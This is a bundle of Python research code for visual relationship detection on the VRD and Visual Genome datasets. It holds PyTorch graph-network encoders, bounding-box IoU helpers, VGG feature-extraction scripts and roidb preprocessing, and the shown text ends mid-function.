def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight.data)
m.bias.data.fill_(0.1)
def node2edge(self, x, rel_rec, rel_send):
receivers = torch.matmul(rel_rec, x)
senders = torch.matmul(rel_send, x)
edges = torch.cat([receivers, senders], dim=2)
return edges
def forward(self, inputs, spatial_feats, rel_rec, rel_send, bbox_loc):
inputs = inputs[:, :, :].contiguous()
x = inputs.view(inputs.size(0), inputs.size(1), -1)
# New shape: [batch_size, num_nodes, num_dims]
if self.use_vis:
x_v = self.fc_vis(x[:, :, :4096]) #[batch_size, num_nodes, n_hid]
e_hid_v = self.node2edge(x_v, rel_rec, rel_send) #[batch_size, num_edges, n_hid*2]
e_v = self.fc_so_vis(e_hid_v) #[batch_size, num_edges, n_hid]
edge_feats = e_v #[batch_size, num_edges, n_hid]
x_cls = self.fc_cls(x[:, :, :4096])
if self.use_cls:
e_hid_cls = self.node2edge(x_cls, rel_rec, rel_send)
e_cls = self.fc_so_cls(e_hid_cls)
edge_feats = torch.cat([edge_feats, e_cls], -1)
if self.use_sem:
if self.use_vis:
x_s = self.fc_sem(x[:, :, 4096:]) #[batch_size, num_nodes, n_hid]
else:
x_s = self.fc_sem(x)
x_cls = self.fc_cls(x)
e_hid_s = self.node2edge(x_s, rel_rec, rel_send) #[batch_size, num_edges, n_hid*2]
e_s = self.fc_so_sem(e_hid_s) #[batch_size, num_edges, n_hid]
if self.use_vis:
edge_feats = torch.cat([edge_feats, e_s], -1) #[batch_size, num_edges, n_hid*2]
else:
edge_feats = e_s
if self.use_spatial:
e_l = self.fc_spatial(spatial_feats) #[batch_size, bun_edges, n_hid]
if self.use_vis or self.use_sem:
edge_feats = torch.cat([edge_feats, e_l], -1) #[batch_size, num_edges, n_hid*3]
else:
edge_feats = e_l
if self.use_loc:
e_loc = self.fc_loc(bbox_loc)
edge_feats = torch.cat([edge_feats, e_loc], -1)
self.edge_feats_final = self.fc_fusion(edge_feats)
output = self.fc_rel(self.edge_feats_final)
return output, x_cls
class NMPEncoder(nn.Module):
def __init__(self, n_hid, edge_types=71, node_types=101, n_iter=2, do_prob=0., use_vis=True, use_spatial=False, use_sem=True, use_loc=False, use_cls=False):
super(MLPEncoder, self).__init__()
self.use_vis = use_vis
self.use_spatial = use_spatial
self.use_sem = use_sem
self.use_loc = use_loc
self.use_cls = use_cls
self.n_iter = n_iter
self.vis_hid = 128
self.sem_hid = n_hid
self.spatial_hid = n_hid
self.loc_hid = 64
self.cls_hid = 64
self.mlp1 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
self.mlp2 = MLP(n_hid, n_hid, n_hid, do_prob)
self.mlp3 = MLP(n_hid * 3, n_hid, n_hid, do_prob)
self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
self.mlp5 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
self.mlp_e2n = MLP(n_hid * 2, n_hid, n_hid, do_prob)
# ------- visual feature ---------#
# self.fc_vis = FC(4096, n_hid)
self.fc_vis = MLP(4096, self.vis_hid, self.vis_hid, do_prob)
# ------ spatial feature ---------#
# self.fc_spatial = FC(512, n_hid)
self.fc_spatial = MLP(512, self.spatial_hid, self.spatial_hid, do_prob)
# ------- semantic feature -------#
# self.fc_sem = FC(300, n_hid)
self.fc_sem = MLP(300, self.sem_hid, self.sem_hid, do_prob)
# ------- location feature -------#
self.fc_loc = MLP(20, self.loc_hid, self.loc_hid, do_prob)
n_fusion = 0
if self.use_vis:
n_fusion += self.vis_hid
if self.use_cls:
n_fusion += self.cls_hid
if self.use_sem:
n_fusion += self.sem_hid
final_fusion = n_hid
if self.use_loc:
final_fusion += self.loc_hid
# # ---- sub obj concat ---------#
# self.fc_so_vis = FC(n_hid*2, n_hid)
# # ---- sub obj concat ---------#
# self.fc_so_sem = FC(n_hid*2, n_hid)
# ---- all the feature into hidden space -------#
self.fc_fusion = FC(n_fusion, n_hid)
self.fc_rel = FC(final_fusion, edge_types, relu=False)
if self.use_vis:
self.fc_cls = FC(4096, node_types, relu=False)
else:
self.fc_cls = FC(300, node_types, relu=False)
self.fc_cls_feat = FC(node_types, self.cls_hid)
self.dropout_prob = do_prob
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight.data)
m.bias.data.fill_(0.1)
def node2edge(self, x, rel_rec, rel_send):
receivers = torch.matmul(rel_rec, x)
senders = torch.matmul(rel_send, x)
edges = torch.cat([receivers, senders], dim=2)
return edges
def edge2node(self, x, rel_rec, rel_send):
new_rec_rec = rel_rec.permute(0,2,1)
weight_rec = torch.sum(new_rec_rec, -1).float()
weight_rec = weight_rec + (weight_rec==0).float()
weight_rec = torch.unsqueeze(weight_rec, -1).expand(weight_rec.size(0), weight_rec.size(1), x.size(-1))
incoming = torch.matmul(new_rec_rec, x)
incoming = incoming / weight_rec
new_rec_send = rel_send.permute(0,2,1)
weight_send = torch.sum(new_rec_send, -1).float()
weight_send = weight_send + (weight_send==0).float()
weight_send = torch.unsqueeze(weight_send, -1).expand(weight_send.size(0), weight_send.size(1), x.size(-1))
outgoing = torch.matmul(new_rec_send, x)
outgoing = outgoing / weight_send
nodes = torch.cat([incoming, outgoing], -1)
# nodes = (incoming + outgoing) * 0.5
# nodes = incoming + outgoing
# nodes = outgoing
# nodes = incoming
return nodes
def forward(self, inputs, spatial_feats, rel_rec, rel_send, bbox_loc):
x = inputs.view(inputs.size(0), inputs.size(1), -1)
batch_size = inputs.size(0)
n_atoms = inputs.size(1)
n_edges = rel_rec.size(1)
if self.use_vis:
x_v = self.fc_vis(x[:, :, :4096]) #[batch_size, num_nodes, n_hid]
node_feats = x_v
if self.use_sem:
x_s = self.fc_sem(x[:, :, 4096:]) #[batch_size, num_nodes, n_hid]
node_feats = torch.cat([node_feats, x_s], -1)
x_cls = self.fc_cls(x[:, :, :4096])
if self.use_cls:
e_cls = self.fc_cls_feat(x_cls)
node_feats = torch.cat([node_feats, e_cls], -1)
else:
x_s = self.fc_sem(x)
node_feats = x_s
x_cls = self.fc_cls(x)
node_feats = self.fc_fusion(node_feats)
if self.use_spatial:
x_l = self.fc_spatial(spatial_feats)
edge_feats = x_l
else:
edge_feats = self.mlp1(self.node2edge(node_feats, rel_rec, rel_send))
x = edge_feats
x = self.mlp_e2n(self.edge2node(x, rel_rec, rel_send))
x = self.mlp2(x)
self.node_feats = x
x = self.node2edge(x, rel_rec, rel_send)
# # n2e
# x = self.mlp4(x)
# x = self.edge2node(x, rel_rec, rel_send)
# x = self.mlp5(x)
# x = self.node2edge(x, rel_rec, rel_send)
# [e_{ij}^1; e_{ij}^2]
x = torch.cat((x, edge_feats), dim=2) # Skip connection
self.edge_feats = self.mlp3(x)
# e_{ij}^2
# self.edge_feats = self.mlp4(x)
if self.use_loc:
e_loc = self.fc_loc(bbox_loc)
self.edge_feats = torch.cat([self.edge_feats, e_loc], -1)
output = self.fc_rel(self.edge_feats)
return output, x_cls
--- FILE SEPARATOR ---
import numpy as np
import cv2
import os
import json
import ipdb
def restore_from_npy(sess, restore_var):
vgg_npy = np.load('../data/pretrained/VGG_imagenet.npy')
vgg_npy = vgg_npy[()]
keys_1 = ['conv1_1', 'conv1_1', 'conv1_2', 'conv1_2', \
'conv2_1', 'conv2_1', 'conv2_2', 'conv2_2', \
'conv3_1', 'conv3_1', 'conv3_2', 'conv3_2', 'conv3_3', 'conv3_3', \
'conv4_1', 'conv4_1', 'conv4_2', 'conv4_2', 'conv4_3', 'conv4_3', \
'conv5_1', 'conv5_1', 'conv5_2', 'conv5_2', 'conv5_3', 'conv5_3', \
'fc6', 'fc6', 'fc7', 'fc7']
keys_2 = ['weights', 'biases', 'weights', 'biases', \
'weights', 'biases', 'weights', 'biases', \
'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
'weights', 'biases', 'weights', 'biases']
for ind, var in enumerate(restore_var):
sess.run(var.assign(vgg_npy[keys_1[ind]][keys_2[ind]]))
return
def read_roidb(roidb_path):
'''python2'''
roidb_file = np.load(roidb_path)
key = roidb_file.keys()[0]
roidb_temp = roidb_file[key]
roidb = roidb_temp[()]
return roidb
def generate_batch(N_total, N_each):
"""
This file is used to generate index of the training batch.
Arg:
N_total:
N_each:
out_put:
index_box: the corresponding index
if the total number can divide the batch_num, just split them
else enlarge the index set to be the minimum miltiple
and randomly choose from the total set as the padding indexes
"""
num_batch = np.int32(N_total/N_each)
if N_total%N_each == 0:
index_box = range(N_total)
else:
index_box = np.empty(shape=[N_each*(num_batch+1)],dtype=np.int32)
index_box[0:N_total] = range(N_total)
N_rest = N_each*(num_batch+1) - N_total
index_box[N_total:] = np.random.randint(0,N_total,N_rest)
return index_box
def check_path_exists(full_log_dir):
if os.path.exists(full_log_dir):
pass
else:
os.mkdir(full_log_dir)
def generate_rela_info(au_box, index, N_each_pair):
s_id = np.int32(index[0])
o_id = np.int32(index[1])
sbox = au_box[s_id]
obox = au_box[o_id]
N_s = len(sbox)
N_o = len(obox)
sa = np.random.randint(0, N_s, [N_each_pair,]) # randomly extract N_each_pair(5 in the config) of the detected boxes
oa = np.random.randint(0, N_o, [N_each_pair,]) # whose iou larger than the threhold
sbox_use = sbox[sa]
obox_use = obox[oa]
return sbox_use, obox_use
def box_id(ori_box, uni_box):
idx = []
for i in range(len(ori_box)):
for j in range(len(uni_box)):
if np.array_equal(ori_box[i], uni_box[j]):
idx.append(j)
return idx
def compute_iou_each(box1, box2):
'''
function: calculate the iou based on the box ordinates
box1: [x_min, y_min, x_max, y_max]
'''
xA = max(box1[0], box2[0])
yA = max(box1[1], box2[1])
xB = min(box1[2], box2[2])
yB = min(box1[3], box2[3])
if xB<xA or yB<yA:
IoU = 0
else:
area_I = (xB - xA + 1) * (yB - yA + 1)
area1 = (box1[2] - box1[0] + 1)*(box1[3] - box1[1] + 1)
area2 = (box2[2] - box2[0] + 1)*(box2[3] - box2[1] + 1)
IoU = area_I/float(area1 + area2 - area_I)
return IoU
def compute_distance(box1, box2):
cx1 = (box1[0] + box1[2])/2.0
cy1 = (box1[1] + box1[3])/2.0
cx2 = (box2[0] + box2[2])/2.0
cy2 = (box2[1] + box2[3])/2.0
x_min = min(box1[0], box2[0])
y_min = min(box1[1], box2[1])
x_max = max(box1[2], box2[2])
y_max = max(box1[3], box2[3])
I = (cx1 - cx2)**2 + (cy1 - cy2)**2
U = (x_min - x_max)**2 + (y_min - y_max)**2
dis = np.sqrt(I/float(U))
return dis
def iou_dis(iou_thre=0.5, dis_thre=0.45):
roidb = read_roidb('./data/vrd_rela_graph_roidb.npz')
train = roidb['train']
test = roidb['test']
new_roidb_test = []
for i in range(len(test)):
new_roidb_use = copy.deepcopy(test[i])
roidb_use = test[i]
keep_index = []
for j in range(len(roidb_use['sub_box_dete'])):
sub_box = roidb_use['sub_box_dete'][j]
obj_box = roidb_use['obj_box_dete'][j]
iou = compute_iou_each(sub_box, obj_box)
dis = compute_distance(sub_box, obj_box)
if (iou>iou_thre) or (dis<dis_thre):
keep_index.append(j)
new_roidb_use['sub_box_dete'] = roidb_use['sub_box_dete'][keep_index]
new_roidb_use['obj_box_dete'] = roidb_use['obj_box_dete'][keep_index]
new_roidb_use['sub_dete'] = roidb_use['sub_dete'][keep_index]
new_roidb_use['obj_dete'] = roidb_use['obj_dete'][keep_index]
new_roidb_use['rela_dete'] = roidb_use['rela_dete'][keep_index]
new_roidb_use['sub_score'] = roidb_use['sub_score'][keep_index]
new_roidb_use['obj_score'] = roidb_use['obj_score'][keep_index]
# print(j, len(keep_index), len(roidb_use['sub_box_dete']))
new_roidb_test.append(new_roidb_use)
# save the object pairs which meet the <iou-dis> constrain
new_roidb = {}
new_roidb['train'] = roidb['train']
new_roidb['test'] = new_roidb_test
np.savez('./data/graph_roidb_iou_dis_{}_{}.npz'.format(iou_thre*10, dis_thre*10), new_roidb)
def compute_iou(box, proposal):
"""
compute the IoU between box with proposal
Arg:
box: [x1,y1,x2,y2]
proposal: N*4 matrix, each line is [p_x1,p_y1,p_x2,p_y2]
output:
IoU: N*1 matrix, every IoU[i] means the IoU between
box with proposal[i,:]
"""
len_proposal = np.shape(proposal)[0]
IoU = np.empty([len_proposal,1])
for i in range(len_proposal):
xA = max(box[0], proposal[i,0])
yA = max(box[1], proposal[i,1])
xB = min(box[2], proposal[i,2])
yB = min(box[3], proposal[i,3])
if xB<xA or yB<yA:
IoU[i,0]=0
else:
area_I = (xB - xA + 1) * (yB - yA + 1)
area1 = (box[2] - box[0] + 1)*(box[3] - box[1] + 1)
area2 = (proposal[i,2] - proposal[i,0] + 1)*(proposal[i,3] - proposal[i,1] + 1)
IoU[i,0] = area_I/float(area1 + area2 - area_I)
return IoU
def generate_au_box(unique_boxes, detected_box, iou_l):
# extract the detected_box whose iou is larger than anyone in the unique ground truth boxes
# return [num(unique_boxeds) * [box_use <== multi detected boxes
# box_temp]] <== the ground truth box
N_unique = len(unique_boxes)
au_box = []
for i in range(N_unique):
box_temp = unique_boxes[i]
iou = compute_iou(box_temp, detected_box)
index_temp = np.where(iou > iou_l)[0]
box_use = detected_box[index_temp]
box_use = np.vstack( (box_use, box_temp ) )
au_box.append(box_use)
return au_box
def im_preprocess(image_path):
image = cv2.imread(image_path)
im_orig = image.astype(np.float32, copy=True)
im_orig -= np.array([[[102.9801, 115.9465, 122.7717]]])
im_shape = im_orig.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
target_size = 600
max_size = 1000
im_scale = float(target_size) / float(im_size_min)
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
# ipdb.set_trace()
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
im_shape_new = np.shape(im)
im_use = np.zeros([1,im_shape_new[0], im_shape_new[1], im_shape_new[2]])
im_use[0,:,:,:] = im
return im_use, im_scale
def get_blob_pred(roidb_use, im_scale, N_each_batch, batch_id):
blob = {}
sub_box = roidb_use['sub_box_gt']*im_scale
obj_box = roidb_use['obj_box_gt']*im_scale
rela = np.int32(roidb_use['rela_gt'])
index = roidb_use['index_pred']
# spatial = roidb_use['spatial_gmm_vec']
index_use = index[batch_id*N_each_batch: (batch_id+1)*N_each_batch]
sub_box_use = sub_box[index_use,:]
obj_box_use = obj_box[index_use,:]
rela_use = rela[index_use]
# spatial_use = spatial[index_use, :]
blob['sub_box'] = sub_box_use
blob['obj_box'] = obj_box_use
blob['rela'] = rela_use
# blob['spatial'] = spatial_use
blob['image'] = roidb_use['image']
return blob
def get_blob_rela(roidb_use, im_scale, N_each_batch, batch_id):
blob = {}
sub_box = roidb_use['sub_box_dete']*im_scale
obj_box = roidb_use['obj_box_dete']*im_scale
rela = np.int32(roidb_use['rela_dete'])
index = roidb_use['index_rela']
# spatial = roidb_use['spatial_gmm_vec']
index_use = index[batch_id*N_each_batch: (batch_id+1)*N_each_batch]
sub_box_use = sub_box[index_use,:]
obj_box_use = obj_box[index_use,:]
rela_use = rela[index_use]
# spatial_use = spatial[index_use, :]
blob['sub_box'] = sub_box_use
blob['obj_box'] = obj_box_use
blob['rela'] = rela_use
# blob['spatial'] = spatial_use
return blob
def count_prior():
roidb = read_roidb('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_roidb.npz')
train = roidb['train_roidb']
prior = np.zeros([100, 100, 70])
for i in range(len(train)):
roidb_use = train[i]
for j in range(len(roidb_use['rela_gt'])):
sub_cls = int(roidb_use['sub_gt'][j])
obj_cls = int(roidb_use['obj_gt'][j])
rela_cls = int(roidb_use['rela_gt'][j])
prior[sub_cls, obj_cls, rela_cls] += 1
np.save('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_prior_count.npy', prior)
prior_count = np.sum(prior, -1)
prior_prob = prior_count/np.sum(prior_count)
np.save('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_prior_prob.npy', prior_prob)
return
--- FILE SEPARATOR ---
'''
Extract features by pretrained VGG checkpoints
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
from ass_fun import *
from vgg import VTranse_Vgg
import ipdb
from tqdm import tqdm
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default='vrd',
help='dataset: vrd or vg')
parser.add_argument('--data_type', type=str, default='pred',
help='data_type: pred or rela')
parser.add_argument('--ori_vgg', action='store_true', default=False,
help='original vgg')
parser.add_argument('--random_vgg', action='store_true', default=False,
help='random initialize vgg')
args = parser.parse_args()
data_type = args.data_type
dataset = args.dataset
use_ori_vgg = args.ori_vgg
use_random_vgg = args.random_vgg
feat_save_path = '/DATA5_DB8/data/yhu/VTransE'
print(args)
if dataset == 'vrd' and data_type == 'pred':
# ---------- vrd pred dataset ---------------#
if use_ori_vgg:
save_path = os.path.join(feat_save_path, 'ori_vrd_vgg_feats')
elif use_random_vgg:
save_path = os.path.join(feat_save_path, 'random_vrd_vgg_feats')
else:
save_path = os.path.join(feat_save_path, 'vrd_vgg_feats')
roidb_path = '../data/vrd_roidb.npz'
res_path = '../data/pretrained/vrd_vgg_pretrained.ckpt'
N_each_batch = 30
is_rela = False
elif dataset == 'vrd' and data_type == 'rela':
# ---------- vrd rela dataset ----------#
if use_ori_vgg:
save_path = os.path.join(feat_save_path, 'ori_vrd_rela_vgg_feats')
elif use_random_vgg:
save_path = os.path.join(feat_save_path, 'random_vrd_rela_vgg_feats')
else:
save_path = os.path.join(feat_save_path, 'vrd_rela_vgg_feats')
roidb_path = '../data/vrd_rela_roidb.npz'
res_path = '../data/pretrained/vrd_vgg_pretrained.ckpt'
N_each_batch = 50
is_rela = True
elif dataset == 'vg' and data_type == 'pred':
# ----------- vg dataset ---------------#
if use_ori_vgg:
save_path = os.path.join(feat_save_path, 'ori_vg_vgg_feats')
else:
save_path = os.path.join(feat_save_path, 'vg_vgg_feats')
roidb_path = '../data/vg_roidb.npz'
res_path = '../data/pretrained/vg_vgg_pretrained.ckpt'
N_each_batch = 30
is_rela = False
elif dataset == 'vg' and data_type == 'rela':
# ----------- vg rela dataset ---------------#
save_path = os.path.join(feat_save_path, 'vg_rela_vgg_feats')
roidb_path = '../data/vg_rela_roidb.npz'
res_path = '../data/pretrained/vg_vgg_pretrained.ckpt'
N_each_batch = 128
is_rela = True
check_path_exists(save_path)
# ------ read roidb file ---------#
roidb_read = read_roidb(roidb_path)
train_roidb = roidb_read['train_roidb']
test_roidb = roidb_read['test_roidb']
N_train = len(train_roidb)
N_test = len(test_roidb)
pbar = tqdm(total=N_train+N_test)
N_show = 100
# ------ Create Graph ------------#
vnet = VTranse_Vgg()
graph_name = vnet.create_graph
train_func = vnet.extract_pred_fc
test_func = vnet.extract_pred_fc
graph_name(N_each_batch, save_path)
total_var = tf.trainable_variables()
restore_var = [var for var in total_var if 'vgg_16' in var.name]
for var in restore_var:
print(var)
saver_res = tf.train.Saver(var_list = restore_var)
with tf.Session() as sess:
init = tf.global_variables_initializer()
sess.run(init)
if use_ori_vgg:
# ------ restore from original vgg ---------#
restore_from_npy(sess, restore_var)
elif use_random_vgg:
pass
else:
# ------ restore from fine-tuned vgg -------#
saver_res.restore(sess, res_path)
# ipdb.set_trace()
t = 0.0
vnet.save_path = save_path + '/train'
check_path_exists(vnet.save_path)
for roidb_id in range(N_train):
roidb_use = train_roidb[roidb_id]
if len(roidb_use['rela_gt']) == 0:
continue
if os.path.exists(os.path.join(vnet.save_path, 'ob_fc7', os.path.basename(roidb_use['image'])+'.npy')):
pass
else:
train_func(sess, roidb_use, is_rela)
t = t + 1.0
if t % N_show == 0:
print("t: {0}".format(t))
pbar.update(1)
vnet.save_path = save_path + '/test'
check_path_exists(vnet.save_path)
for roidb_id in range(N_test):
roidb_use = test_roidb[roidb_id]
if len(roidb_use['rela_gt']) == 0:
continue
if os.path.exists(os.path.join(vnet.save_path, 'ob_fc7', os.path.basename(roidb_use['image'])+'.npy')):
pass
else:
test_func(sess, roidb_use, is_rela)
t = t + 1.0
if t % N_show == 0:
print("t: {0}".format(t))
pbar.update(1)
pbar.close()
--- FILE SEPARATOR ---
'''
Feed the path of vgg features into roidb file
'''
import numpy as np
import os
import ipdb
from ass_fun import *
from tqdm import tqdm
import gensim
import h5py
import json
from sklearn.decomposition import PCA
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default='vrd',
help='dataset: vrd or vg')
parser.add_argument('--data_type', type=str, default='pred',
help='data_type: pred or rela')
parser.add_argument('--ori_vgg', action='store_true', default=False,
help='original vgg')
parser.add_argument('--random_vgg', action='store_true', default=False,
help='random initialize vgg')
args = parser.parse_args()
data_type = args.data_type
dataset = args.dataset
use_ori_vgg = args.ori_vgg
use_random_vgg = args.random_vgg
print(args)
#============= the max rela of one image ========================#
def count_max_rela(train_roidb, test_roidb):
rela_total = []
for name, roidb in zip(['train', 'test'], [train_roidb, test_roidb]):
rela = np.zeros(len(roidb), dtype=np.int64)
for i in range(len(roidb)):
rela[i] = int(len(roidb[i]['rela_gt']))
r_max = np.max(rela)
r_min = np.min(rela)
r_mean = np.mean(rela)
print("{0} | max: {1} | mean: {2} | min: {3}".format(name, r_max, r_mean, r_min))
# VRD
# train | max: 34 | mean: 8.03042328042 | min: 1
# test | max: 41 | mean: 8.0 | min: 1
# VG
# train | max: 490 | mean: 10.8853836355 | min: 1
# test | max: 352 | mean: 11.0894500735 | min: 1
rela_total.append(rela)
return
#============== pred the max objects in one image ======================#
def unique_gt(box_gt, cls_gt, fc7):
_, idx = np.unique(box_gt, axis=0, return_index=True)
idx = np.sort(idx)
uni_box_gt = box_gt[idx]
uni_cls_gt = cls_gt[idx]
uni_fc7 = fc7[idx]
return uni_box_gt, uni_cls_gt, uni_fc7
def new_id(uni_box_gt, ori_box_gt, ori_cls_gt):
new_idx = np.zeros_like(ori_cls_gt)
for i in range(len(ori_box_gt)):
for j in range(len(uni_box_gt)):
if np.array_equal(ori_box_gt[i], uni_box_gt[j]):
new_idx[i] = j
return new_idx
def pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types = 70):
edge_total = []
node_total = []
new_roidb = {}
pbar = tqdm(total=len(train_roidb)+len(test_roidb))
for name, roidb in zip(['train', 'test'], [train_roidb, test_roidb]):
full_path = save_path + '/' + name
feat_name = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
check_path_exists(full_path+'/uni_fc7')
rela = np.zeros(len(roidb), dtype=np.int64)
edges = []
nodes = []
for i in range(len(roidb)):
#====== feats ============#
sub_fc7 = np.load(os.path.join(full_path, 'sub_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
ob_fc7 = np.load(os.path.join(full_path, 'ob_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
fc7 = np.concatenate([sub_fc7, ob_fc7], 0)
# sub_pool5 = np.load(os.path.join(full_path, 'sub_pool5', os.path.basename(roidb[i]['image'])+'.npy'))
# ob_pool5 = np.load(os.path.join(full_path, 'ob_pool5', os.path.basename(roidb[i]['image'])+'.npy'))
# pool5 = np.concatenate([sub_pool5, ob_pool5], 0)
box_gt = np.concatenate([roidb[i]['sub_box_gt'], roidb[i]['obj_box_gt']], 0)
cls_gt = np.concatenate([roidb[i]['sub_gt'], roidb[i]['obj_gt']], 0)
uni_box_gt, uni_cls_gt, uni_fc7 = unique_gt(box_gt, cls_gt, fc7)
sub_idx = new_id(uni_box_gt, roidb[i]['sub_box_gt'], roidb[i]['sub_gt'])
obj_idx = new_id(uni_box_gt, roidb[i]['obj_box_gt'], roidb[i]['obj_gt'])
# ipdb.set_trace()
edge_matrix = np.zeros([len(uni_cls_gt), len(uni_cls_gt)]) + edges_types
for j, x, y in zip(np.array(range(len(sub_idx))), sub_idx, obj_idx):
edge_matrix[int(x)][int(y)] = roidb[i]['rela_gt'][j]
nodes.append(len(uni_cls_gt))
edges.append(len(roidb[i]['rela_gt']))
roidb[i]['uni_box_gt'] = uni_box_gt
roidb[i]['uni_gt'] = uni_cls_gt
roidb[i]['edge_matrix'] = edge_matrix
roidb[i]['sub_idx'] = sub_idx
roidb[i]['obj_idx'] = obj_idx
pred_pool5_path = os.path.join(full_path, 'pred_pool5', os.path.basename(roidb[i]['image'])+'.npy')
pred_fc7_path = os.path.join(full_path, 'pred_fc7', os.path.basename(roidb[i]['image'])+'.npy')
uni_fc7_path = os.path.join(full_path, 'uni_fc7', os.path.basename(roidb[i]['image'])+'.npy')
img_fc7_path = os.path.join(full_path, 'fc7', os.path.basename(roidb[i]['image'])+'.npy')
img_pool5_path = os.path.join(full_path, 'pool5', os.path.basename(roidb[i]['image'])+'.npy')
if os.path.exists(uni_fc7_path):
pass
else:
np.save(uni_fc7_path, uni_fc7)
roidb[i]['pred_pool5'] = pred_pool5_path
roidb[i]['pred_fc7'] = pred_fc7_path
roidb[i]['uni_fc7'] = uni_fc7_path
roidb[i]['img_fc7'] = img_fc7_path
roidb[i]['img_pool5'] = img_pool5_path
pbar.update(1)
new_roidb[name] = roidb
print("nodes: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(nodes), np.mean(nodes), np.min(nodes)))
print("edges: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(edges), np.mean(edges), np.min(edges)))
edge_total.append(edges)
node_total.append(nodes)
pbar.close()
np.savez('../data/{}_pred_graph_roidb.npz'.format(dataset), new_roidb)
return
def rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types = 70):
edge_total = []
node_total = []
new_roidb = {}
pbar = tqdm(total=len(test_roidb)+len(train_roidb))
# ------- test rela -------------#
for name, roidb in zip(['train', 'test'], [train_roidb, test_roidb]):
full_path = save_path + '/' + name
# feat_name = ['pool5', 'fc7', 'sub_fc7', 'ob_fc7']
feat_name = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
check_path_exists(full_path+'/uni_fc7')
rela = np.zeros(len(roidb), dtype=np.int64)
edges = []
nodes = []
for i in range(len(roidb)):
#====== feats ============#
sub_fc7 = np.load(os.path.join(full_path, 'sub_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
ob_fc7 = np.load(os.path.join(full_path, 'ob_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
fc7 = np.concatenate([sub_fc7, ob_fc7], 0)
box_gt = np.concatenate([roidb[i]['sub_box_dete'], roidb[i]['obj_box_dete']], 0)
cls_gt = np.concatenate([roidb[i]['sub_dete'], roidb[i]['obj_dete']], 0)
uni_box_gt, uni_cls_gt, uni_fc7 = unique_gt(box_gt, cls_gt, fc7)
sub_idx = new_id(uni_box_gt, roidb[i]['sub_box_dete'], roidb[i]['sub_dete'])
obj_idx = new_id(uni_box_gt, roidb[i]['obj_box_dete'], roidb[i]['obj_dete'])
edge_matrix = np.zeros([len(uni_cls_gt), len(uni_cls_gt)]) + edges_types
for j, x, y in zip(np.array(range(len(sub_idx))), sub_idx, obj_idx):
edge_matrix[int(x)][int(y)] = roidb[i]['rela_dete'][j]
nodes.append(len(uni_cls_gt))
edges.append(len(roidb[i]['rela_gt']))
roidb[i]['uni_box_gt'] = uni_box_gt
roidb[i]['uni_gt'] = uni_cls_gt
roidb[i]['edge_matrix'] = edge_matrix
roidb[i]['sub_idx'] = sub_idx
roidb[i]['obj_idx'] = obj_idx
pred_pool5_path = os.path.join(full_path, 'pred_pool5', os.path.basename(roidb[i]['image'])+'.npy')
pred_fc7_path = os.path.join(full_path, 'pred_fc7', os.path.basename(roidb[i]['image'])+'.npy')
uni_fc7_path = os.path.join(full_path, 'uni_fc7', os.path.basename(roidb[i]['image'])+'.npy')
img_fc7_path = os.path.join(full_path, 'fc7', os.path.basename(roidb[i]['image'])+'.npy')
img_pool5_path = os.path.join(full_path, 'pool5', os.path.basename(roidb[i]['image'])+'.npy')
np.save(uni_fc7_path, uni_fc7)
roidb[i]['pred_pool5'] = pred_pool5_path
roidb[i]['pred_fc7'] = pred_fc7_path
roidb[i]['uni_fc7'] = uni_fc7_path
roidb[i]['img_fc7'] = img_fc7_path
roidb[i]['img_pool5'] = img_pool5_path
pbar.update(1)
new_roidb[name] = roidb
print("nodes: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(nodes), np.mean(nodes), np.min(nodes)))
print("edges: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(edges), np.mean(edges), np.min(edges)))
# train | max: 21 | mean: 6.95423280423 | min: 1
# test | max: 20 | mean: 7.00838574423 | min: 2
edge_total.append(edges)
node_total.append(nodes)
np.savez('../data/{}_rela_graph_roidb.npz'.format(dataset), new_roidb)
pbar.close()
return roidb
def process_vrd_pred_instance_data(save_path):
'''
function: Build the source data for instance-level training
node feature :[num_instance, 4096+300]
edge label: [num_instance, 4096+300]
'''
data_dir = '../data'
save_dir = save_path
predicates_vec = np.load(os.path.join(data_dir, 'predicates_vec.npy'))
objects_vec = np.load(os.path.join(data_dir, 'objects_vec.npy'))
roidb_read = read_roidb(os.path.join(save_dir, 'graph_roidb.npz'))
train_roidb = roidb_read['train']
test_roidb = roidb_read['test']
N_train = len(train_roidb)
N_test = len(test_roidb)
pbar = tqdm(total=N_train+N_test+N_test)
def initial(N, roidb):
sub_nodes = []
obj_nodes = []
edges = []
for i in range(N):
roidb_use = roidb[i]
uni_box = roidb_use['uni_box_gt']
sub_idx = box_id(roidb_use['sub_box_gt'], uni_box)
obj_idx = box_id(roidb_use['obj_box_gt'], uni_box)
nodes_feat = np.load(roidb_use['uni_fc7'])
sub_feat = list(map(lambda x: nodes_feat[int(x)], sub_idx))
